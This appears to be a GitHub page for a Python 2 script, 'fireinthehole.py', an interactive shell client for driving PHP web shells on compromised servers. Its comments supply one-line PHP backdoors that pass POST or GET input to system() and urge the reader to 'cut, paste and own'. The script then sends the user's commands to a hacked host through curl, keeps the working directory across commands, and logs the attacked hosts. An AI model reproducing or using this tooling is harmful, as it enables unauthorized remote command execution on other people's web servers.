-
Notifications
You must be signed in to change notification settings - Fork 43
/
fireinthehole.py
211 lines (198 loc) · 6.18 KB
/
fireinthehole.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell - fireinthehole.py
# Only for UNIX based systems at the moment.
# It's a very messy script, but surprisingly it works quite well...
# Shouldn't be much need to mess with the variables and configuration
# Just cut, paste and own, you 1337 h4x0r, you
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke, some Aussies and anyone keeping the scene alive
# Please don't strip the credits out if you modify or redistribute.
import sys, os, time, readline
print '''
Malformation's Interactive HTTP GET and POST Shell v1.0.0B
Command history using readline - Just use the arrow keys
Set your prompt like this: set prompt <prompt_here>
Host history - attack someone on a rainy day when you're bored
Tries to maintain current working directory when you use 'cd'.
Usage:
\tEnter the host => hacked.com/hacked.php
\tGET/POST => POST
\tEnter the POST variable => cmd
\thacked.com/hacked.php# ls -la
\ttotal 8673
\tdrwxr-xr-x 2 web web 4096 2009-09-03 11:54 .
\tdrwxr-xr-x 15 web web 4096 2009-09-08 13:37 ..
\t-rw-r--r-- 1 web web 481 2009-09-02 18:58 hacked.php
\thacked.com/hacked.php# set prompt $
\t$ .
\tBye.
'''
# # # # # Configuration # # # # # # # # # # # # #
# 1 to turn on curl verbosity #
debug = 0 #
logfile1 = "fireinthehole.txt" #
logfile2 = "fireinthehole-hosts.txt" #
# #
# #
# The file handle below is just for appending #
# Don't change it #
logfile3 = logfile2 #
# # # # # # # # # # # # # # # # # # # # # # # # #
write = 0
write2 = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []
set_prompt = 0
prompt = ""
number = 0
hosts_array = []
skip_insert = 0
dont_write = 0
for i in range(0,len(curl_array)):
if (os.path.exists(curl_array[i] + "curl")):
count = count + 1
curl_dirs = curl_dirs + curl_array[i] + " "
if (count == 0):
print "Couldn't find curl. Tried looking in " + curl_dirs
sys.exit(0)
try:
if (os.path.exists(logfile1)):
file = open(logfile1,"a")
else:
file = open(logfile1,"w")
write = 1
print "Output will be saved to " + logfile1
if (os.path.exists(logfile2)):
hosts_history = open(logfile2,"r+")
hosts_history2 = open(logfile3,"a")
else:
hosts_history2 = open(logfile3,"a")
write2 = 1
print "Hosts will be saved to " + logfile2
except IOError:
print "Directory not writable, output will not be saved."
try:
if (write2 == 1):
if (os.path.exists(logfile2)):
if (os.path.getsize(logfile2) != 0):
print "Previous hosts: "
while(1):
thisline = hosts_history.readline()
thisline = thisline.strip()
if thisline:
print "\t[" + str(number) + "] " + thisline
hosts_array.insert(number, thisline)
number = number + 1
else:
break
while(1):
host = raw_input("Enter a number or new host => ")
try:
host_inted = int(host)
except ValueError:
break
if (type(host_inted) == int):
if ((host_inted < len(hosts_array)) and (host_inted > -1)):
host = hosts_array[host_inted]
skip_insert = 1
break
else:
print "Wrong number, enter again correctly"
continue
break
else:
host = raw_input("Enter the host => ")
else:
host = raw_input("Enter the host => ")
else:
host = raw_input("Enter the host => ")
readline.add_history(host) #Thanks nemo and andrewg
host_split = host.split(",") #This won't affect anything since there is no ',' in a url and it wont get affected, so we don't need to check for bad input
if (skip_insert == 0):
method = raw_input("GET/POST => ")
readline.add_history(method)
if (method == "GET"):
myvar = raw_input("Enter the GET variable => ")
elif (method == "POST"):
myvar = raw_input("Enter the POST variable => ")
else:
sys.exit(0)
if ((host_split[0] + "," + method + "," + myvar) in hosts_array):
print "You already had this as a previous host!"
dont_write = 1
readline.add_history(myvar)
else:
method = host_split[1]
readline.add_history(method)
myvar = host_split[2]
readline.add_history(myvar)
if (write2 == 1):
if (skip_insert == 0):
if (dont_write == 0):
hosts_history2.write(host + "," + method + "," + myvar + "\n")
while True:
if (set_prompt == 1):
mycommand = raw_input(prompt)
else:
mycommand = raw_input(host_split[0] + "# ")
readline.add_history(mycommand)
origcommand = mycommand
finalcommand = ""
if (mycommand == "."):
print "Bye."
sys.exit(0)
if (mycommand.find("set prompt ") != -1):
set_prompt = 1
prompt = mycommand[11:len(string)]
continue
mycommand = mycommand + "; "
if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
dir_array.insert(len(dir_array) + 1, mycommand)
if (method == "GET"):
string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\""
else:
string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
if (debug == 1):
print string + ":\n"
continue
if (len(dir_array) != 0):
for j in range(0,len(dir_array)):
finalcommand = finalcommand + dir_array[j]
finalcommand = finalcommand + mycommand
if (finalcommand != ""):
mycommand = finalcommand
if (method == "GET"):
string = "curl -s \"" + host_split[0] + "?" + myvar + "=" + mycommand + "\""
else:
string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host_split[0]
if (debug == 1):
print string + ":\n"
command = os.popen(string,"r")
if (write == 1):
if (set_prompt == 1):
file.write(prompt + origcommand + "\n")
else:
file.write(host_split[0] + "# " + origcommand + "\n")
while(1):
line = command.readline()
line = line.strip()
if line:
print line
if (write == 1):
file.write(line + "\n")
else:
break
except KeyboardInterrupt:
print "\nBye."
sys.exit(0)
except:
print "Unhandled exception"
sys.exit(0)